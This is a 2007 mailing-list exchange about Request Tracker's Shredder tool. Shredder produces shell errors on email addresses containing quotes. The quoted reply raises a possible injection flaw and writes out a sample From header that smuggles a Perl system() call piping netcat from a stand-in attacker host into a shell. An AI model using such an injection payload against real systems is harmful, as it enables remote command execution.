[rt-users] Spam email question

Mathew Snyder theillien at yahoo.com
Thu Feb 8 21:52:43 EST 2007 

I created a user called, for no reason in particular, splat's at thisplace.com.
The error received is:

sh: -c: line 0: unexpected EOF while looking for matching `''
sh: -c: line 1: syntax error: unexpected end of file

Th first line is the one I get most often.  The second is because it happened to
be the last email address to be shredded.  Usually Shredder will spit out the
first line and then move on to the next address at which point, everything will
chug along nicely.

Mathew

der Mouse wrote:
>> Shredder doesn't like when an email address contains either a single-
>> or double-qoute.
> 
> An email address, or the name associated with an email address?  If it
> really is broken enough to get upset when an email address includes
> unbalanced quotes, it's, well, broken; "\(*&$%\""@example.com is a
> perfectly good email address, as is '^#&!`|@example.com.  (Some people
> have even used such addresses, and find they don't get picked up by
> spammer scrapeware - a useful property for email addresses to have.)
> 
> Even if it's the associated name, I'd call that somewhat broken.  I
> know someone who uses "Patrick O'Reilly" as the name portion of his
> email address (not coincidentally, that's his name).
> 
>> Understandably so considering this messes with Perl and makes it look
>> for a closing, matching mark.
> 
> I find that extremely disturbing, because it implies that RT is
> encountering these things in contexts where its string parsing code is
> kicking in.  This makes me wonder if perhaps a mail bearing a header
> like
> 
> From: "; system('cat /dev/null | nc evil.cracker.example.org 12345 | sh'); $dummy = " <me at innocent.example.org>
> 
> would do something nasty.  (It would even be legal from an email point
> of view.)
> 
> /~\ The ASCII				der Mouse
> \ / Ribbon Campaign
>  X  Against HTML	       mouse at rodents.montreal.qc.ca
> / \ Email!	     7D C8 61 52 5D E7 2D 39  4E F1 31 3E E8 B3 27 4B
> _______________________________________________
> http://lists.bestpractical.com/cgi-bin/mailman/listinfo/rt-users
> 
> Community help: http://wiki.bestpractical.com
> Commercial support: sales at bestpractical.com
> 
> 
> Discover RT's hidden secrets with RT Essentials from O'Reilly Media. 
> Buy a copy at http://rtbook.bestpractical.com
>

More information about the rt-users mailing list